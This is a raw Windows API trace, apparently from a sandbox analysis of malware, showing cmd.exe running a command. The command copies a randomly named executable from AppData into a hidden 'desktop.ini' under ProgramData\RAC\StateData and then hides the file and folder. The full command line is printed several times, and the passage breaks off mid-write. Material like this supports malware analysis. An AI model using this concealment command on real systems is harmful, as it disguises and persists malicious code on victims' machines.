lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e734 | out: phkResult=0x18e734*=0x40) returned 0x0 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x0, lpData=0x18e740*=0x98, lpcbData=0x18e738*=0x1000) returned 0x2 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x4, lpData=0x18e740*=0x1, lpcbData=0x18e738*=0x4) returned 0x0 [0127.114] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x0, lpData=0x18e740*=0x1, lpcbData=0x18e738*=0x1000) returned 0x2 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x4, lpData=0x18e740*=0x0, lpcbData=0x18e738*=0x4) returned 0x0 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x4, lpData=0x18e740*=0x40, lpcbData=0x18e738*=0x4) returned 0x0 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x4, lpData=0x18e740*=0x40, lpcbData=0x18e738*=0x4) returned 0x0 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x0, lpData=0x18e740*=0x40, lpcbData=0x18e738*=0x1000) returned 0x2 [0127.114] RegCloseKey (hKey=0x40) returned 0x0 [0127.114] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e734 | out: phkResult=0x18e734*=0x40) returned 0x0 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x0, lpData=0x18e740*=0x40, lpcbData=0x18e738*=0x1000) returned 0x2 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x4, lpData=0x18e740*=0x1, lpcbData=0x18e738*=0x4) returned 0x0 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e73c, 
lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x0, lpData=0x18e740*=0x1, lpcbData=0x18e738*=0x1000) returned 0x2 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x4, lpData=0x18e740*=0x0, lpcbData=0x18e738*=0x4) returned 0x0 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x4, lpData=0x18e740*=0x9, lpcbData=0x18e738*=0x4) returned 0x0 [0127.114] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x4, lpData=0x18e740*=0x9, lpcbData=0x18e738*=0x4) returned 0x0 [0127.115] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e73c, lpData=0x18e740, lpcbData=0x18e738*=0x1000 | out: lpType=0x18e73c*=0x0, lpData=0x18e740*=0x9, lpcbData=0x18e738*=0x1000) returned 0x2 [0127.115] RegCloseKey (hKey=0x40) returned 0x0 [0127.115] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886361 [0127.115] srand (_Seed=0x5b886361) [0127.115] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\"" [0127.115] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" & type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\"" [0127.115] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.115] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x371c48, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0127.115] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.115] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.115] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.115] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0127.115] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0127.116] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0127.116] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0127.116] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0127.116] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0127.116] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0127.116] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0127.116] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0127.116] GetEnvironmentStringsW () returned 0x372638* [0127.116] FreeEnvironmentStringsW (penv=0x372638) returned 1 [0127.116] GetEnvironmentVariableW (in: lpName="COMSPEC", 
lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.116] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.116] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0127.116] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0127.116] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0127.116] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0127.116] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0127.116] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0127.116] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0127.116] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0127.116] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f500 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.116] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f500, lpFilePart=0x18f4fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f4fc*="Desktop") returned 0x18 [0127.116] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0127.117] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f27c | out: lpFindFileData=0x18f27c) returned 0x370cc8 [0127.117] FindClose (in: hFindFile=0x370cc8 | out: hFindFile=0x370cc8) returned 1 [0127.117] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f27c | out: lpFindFileData=0x18f27c) returned 0x370cc8 [0127.117] FindClose (in: hFindFile=0x370cc8 | out: hFindFile=0x370cc8) returned 1 [0127.117] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f27c | out: lpFindFileData=0x18f27c) returned 0x370cc8 [0127.117] FindClose (in: hFindFile=0x370cc8 | out: hFindFile=0x370cc8) returned 1 [0127.117] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0127.117] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0127.117] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0127.117] GetEnvironmentStringsW () returned 0x3704e8* [0127.118] FreeEnvironmentStringsW (penv=0x3704e8) returned 1 [0127.118] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.118] GetConsoleOutputCP () returned 0x1b5 [0127.118] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.118] GetUserDefaultLCID () returned 0x409 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f640, cchData=128 | out: lpLCData="0") returned 2 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f640, cchData=128 | out: lpLCData="0") returned 2 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f640, cchData=128 | out: lpLCData="1") returned 2 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") 
returned 4 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0127.119] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0127.119] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0127.120] GetConsoleTitleW (in: lpConsoleTitle=0x360af8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.121] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0127.121] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0127.121] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0127.121] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0127.122] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0127.122] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0127.122] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0127.122] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0127.122] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0127.122] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0127.122] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0127.124] _wcsicmp (_String1="del", _String2=")") returned 59 [0127.124] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0127.124] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0127.124] _wcsicmp (_String1="IF", _String2="del") returned 5 [0127.124] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0127.124] _wcsicmp (_String1="REM", _String2="del") returned 14 [0127.125] _wcsicmp (_String1="REM/?", 
_String2="del") returned 14 [0127.127] _wcsicmp (_String1="type", _String2=")") returned 75 [0127.127] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0127.127] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0127.127] _wcsicmp (_String1="IF", _String2="type") returned -11 [0127.127] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0127.127] _wcsicmp (_String1="REM", _String2="type") returned -2 [0127.127] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0127.159] SetErrorMode (uMode=0x0) returned 0x0 [0127.159] SetErrorMode (uMode=0x1) returned 0x0 [0127.159] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3704f0, lpFilePart=0x18edf4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18edf4*="Desktop") returned 0x18 [0127.159] SetErrorMode (uMode=0x0) returned 0x1 [0127.159] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.159] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0127.165] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.166] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x18eb70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb70) returned 0xffffffff [0127.166] GetLastError () returned 0x2 [0127.166] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x18eb70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb70) returned 0xffffffff [0127.166] GetLastError () returned 0x2 [0127.166] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x18eb70, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb70) returned 0x3725d8 [0127.167] FindClose (in: hFindFile=0x3725d8 | out: hFindFile=0x3725d8) returned 1 [0127.167] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x18eb70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb70) returned 0xffffffff [0127.167] GetLastError () returned 0x2 [0127.167] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x18eb70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb70) returned 0x3725d8 [0127.167] FindClose (in: hFindFile=0x3725d8 | out: hFindFile=0x3725d8) returned 1 [0127.167] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0127.167] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0127.167] GetConsoleTitleW (in: lpConsoleTitle=0x18f068, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.167] InitializeProcThreadAttributeList (in: lpAttributeList=0x18eef0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18efb8 | out: lpAttributeList=0x18eef0, lpSize=0x18efb8) returned 1 [0127.167] UpdateProcThreadAttribute (in: lpAttributeList=0x18eef0, dwFlags=0x0, Attribute=0x60001, lpValue=0x18efb0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18eef0, lpPreviousValue=0x0) returned 1 [0127.167] GetStartupInfoW (in: lpStartupInfo=0x18eeac | out: lpStartupInfo=0x18eeac*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0127.168] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0127.169] CreateProcessW (in: 
lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18ef4c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ef98 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini\" ", lpProcessInformation=0x18ef98*(hProcess=0x50, hThread=0x4c, dwProcessId=0xff4, dwThreadId=0xff8)) returned 1 [0127.175] CloseHandle (hObject=0x4c) returned 1 [0127.175] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0127.175] GetEnvironmentStringsW () returned 0x370a18* [0127.175] FreeEnvironmentStringsW (penv=0x370a18) returned 1 [0127.175] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0127.219] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x18ee8c | out: lpExitCode=0x18ee8c*=0x0) returned 1 [0127.219] CloseHandle (hObject=0x50) returned 1 [0127.219] _vsnwprintf (in: _Buffer=0x18efd4, _BufferCount=0x13, _Format="%08X", _ArgList=0x18ee98 | out: _Buffer="00000000") returned 8 [0127.219] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0127.219] GetEnvironmentStringsW () returned 0x372628* [0127.220] FreeEnvironmentStringsW (penv=0x372628) returned 1 [0127.220] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0127.220] GetEnvironmentStringsW () returned 0x372628* [0127.220] FreeEnvironmentStringsW (penv=0x372628) returned 1 [0127.220] 
DeleteProcThreadAttributeList (in: lpAttributeList=0x18eef0 | out: lpAttributeList=0x18eef0) [0127.220] GetConsoleTitleW (in: lpConsoleTitle=0x18f270, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.220] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x18e2e8, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x18e2ec, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x18e2e8*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0127.221] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0127.221] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0127.221] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0127.221] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\rac\\stated~1\\desktop.ini")) returned 0xffffffff [0127.221] GetLastError () returned 0x2 [0127.221] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1" (normalized: "c:\\users\\alluse~1\\micros~1\\rac\\stated~1")) returned 0x2010 [0127.221] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0127.221] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0127.221] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\rac\\stated~1\\desktop.ini")) returned 0xffffffff [0127.221] GetLastError () returned 0x2 [0127.221] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x3736b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3736b4) returned 0xffffffff [0127.221] GetLastError () returned 0x2 [0127.222] _get_osfhandle (_FileHandle=2) returned 0xb [0127.222] 
GetFileType (hFile=0xb) returned 0x2 [0127.222] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0127.222] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18ece8 | out: lpMode=0x18ece8) returned 1 [0127.222] _get_osfhandle (_FileHandle=2) returned 0xb [0127.222] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x18ed1c | out: lpConsoleScreenBufferInfo=0x18ed1c) returned 1 [0127.222] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0127.223] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.223] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.223] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.223] GetFileType (hFile=0x7) returned 0x2 [0127.223] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0127.223] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f40c | out: lpMode=0x18f40c) returned 1 [0127.223] _dup (_FileHandle=1) returned 3 [0127.224] _close (_FileHandle=1) returned 0 [0127.224] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini", _String2="con") returned -53 [0127.224] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\STATED~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\rac\\stated~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x18f3dc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0127.224] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0127.224] GetConsoleTitleW (in: lpConsoleTitle=0x18f20c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.224] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x18ed70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed70) returned 0x36e6b8 
[0127.225] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0127.225] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0127.225] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0127.225] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18dc7c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0127.225] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0127.225] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.225] GetFileType (hFile=0x58) returned 0x1 [0127.225] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.225] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x18dcd4 | out: lpFileSizeHigh=0x18dcd4*=0x0) returned 0x7d600 [0127.225] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.225] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.225] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.225] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.227] GetFileType (hFile=0x50) returned 0x1 [0127.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.227] GetFileType (hFile=0x50) returned 0x1 [0127.227] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.227] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, 
